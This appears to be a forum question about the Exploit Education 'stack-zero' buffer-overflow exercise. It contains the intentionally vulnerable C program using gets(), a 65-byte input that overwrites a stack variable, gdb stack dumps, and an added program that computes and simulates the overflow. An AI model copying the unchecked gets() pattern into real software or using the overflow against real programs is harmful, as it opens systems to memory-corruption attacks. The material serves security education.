I am learning binary exploitation at the moment with gdb (gef extension) and was doing the following exercise, where you are given the source code of a program and are to overwrite the changeme variable with a buffer overflow exploiting the gets() function:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* The challenge build passes LEVELNAME on the compiler command line; this
 * fallback (assumed, taken from the challenge URL) only keeps the file
 * compiling standalone. */
#ifndef LEVELNAME
#define LEVELNAME "stack-zero"
#endif

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

/* gets() was removed from modern C headers, so the challenge declares it itself. */
char *gets(char *);

int main(int argc, char **argv) {
  /* buffer and changeme are members of one struct, so changeme is laid out
   * directly after the 64-byte buffer. */
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  printf("%s\n", BANNER);

  locals.changeme = 0;
  gets(locals.buffer); /* no bounds check: input longer than 64 bytes spills into changeme */

  if (locals.changeme != 0) {
    puts("Well done, the 'changeme' variable has been changed!");
  } else {
    puts(
        "Uh oh, 'changeme' has not yet been changed. Would you like to try "
        "again?");
  }

  exit(0);
}
The challenge is easy enough once you realize you can just input a huge string. However, after analyzing the problem I found that you had to enter a string of length 65 or longer to solve the challenge, which you can deduce if you analyze the stack:
run <<< $(python3 -c 'print("A"*64)') (fails)
x/64x $sp
0x7fffffffdfc0: 0xffffe108 0x00007fff 0xffffdff7 0x00000001
0x7fffffffdfd0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdfe0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdff0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe000: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe010: 0x00000000 0x00007fff 0x00000000 0x00000000
0x7fffffffe020: 0x555551b0 0x00005555 0xf7e1fbbb 0x00007fff
[...]
run <<< $(python3 -c 'print("A"*65)') (succeeds)
x/64x $sp
0x7fffffffdfc0: 0xffffe108 0x00007fff 0xffffdff7 0x00000001
0x7fffffffdfd0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdfe0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdff0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe000: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe010: 0x00000041 0x00007fff 0x00000000 0x00000000
0x7fffffffe020: 0x555551b0 0x00005555 0xf7e1fbbb 0x00007fff
[...]
That is, the variable changeme is stored on the stack at address 0x7fffffffe010. My question is whether there exist more sophisticated methods to snipe the specific location of declared variables on the stack, something like:
find var changeme in stack (pseudo)
that then returns the address 0x7fffffffe010.
Thank you!
External links:
Challange site: https://exploit.education/phoenix/stack-zero/
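As an added example that is not part of the original question: the offset that the two stack dumps above reveal empirically (64 bytes of 'A' leave changeme at 0x00000000, 65 bytes set it to 0x00000041) can be derived from the struct layout alone. The program below replicates the challenge's locals struct, computes the distance from buffer to changeme with offsetof() and with plain pointer arithmetic, and simulates gets() writing n bytes plus its NUL terminator into the struct. It assumes a little-endian machine (as in the dumps), and the struct name locals and the helper names are my own.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Replica of the 'locals' struct from the stack-zero source. Because the
 * two members live in one struct, the compiler has to place changeme right
 * after buffer; no padding is inserted since 64 is already a multiple of 4.
 */
struct locals {
    char buffer[64];
    volatile int changeme;
};

/* Compile-time distance, in bytes, from the start of buffer to changeme. */
size_t changeme_offset(void)
{
    return offsetof(struct locals, changeme) - offsetof(struct locals, buffer);
}

/*
 * Run-time version of the same measurement: the pointer arithmetic you can
 * also type into gdb as  p (char *)&locals.changeme - locals.buffer
 */
ptrdiff_t changeme_distance_at_runtime(void)
{
    struct locals l;
    return (char *)&l.changeme - l.buffer;
}

/*
 * Simulate gets() reading n bytes of 'A' into buffer: copy n bytes with no
 * bounds check, then append the NUL terminator exactly as gets() does.
 * Returns the value of changeme afterwards, or -1 if n would run past the
 * end of the struct (the simulation stays inside the object so that it is
 * well-defined, unlike the real overflow).
 */
int changeme_after_input(size_t n)
{
    struct locals l;
    unsigned char *base = (unsigned char *)&l;

    if (n + 1 > sizeof l)
        return -1;

    l.changeme = 0;
    memset(l.buffer, 0, sizeof l.buffer);
    memset(base, 'A', n);   /* the overflow: bytes 64 and up land in changeme */
    base[n] = '\0';         /* gets() terminates the line with NUL */
    return l.changeme;
}

int main(void)
{
    printf("changeme is %zu bytes after buffer (runtime check: %td)\n",
           changeme_offset(), changeme_distance_at_runtime());
    for (size_t n = 63; n <= 67; n++)
        printf("%zu bytes of input -> changeme = 0x%08x\n",
               n, (unsigned)changeme_after_input(n));
    return 0;
}
```

The 64-byte case is the instructive one: the 'A's fill buffer exactly and the terminating NUL lands in the first byte of changeme, which was already zero, so the check still fails; with 65 bytes that first byte becomes 0x41. When the binary is built with debug info (gcc -g), gdb can answer the address question directly: ptype locals shows the layout, and p &locals.changeme prints the field's address instead of having to read it off a raw x/64x dump.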
User contributions licensed under CC BY-SA 3.0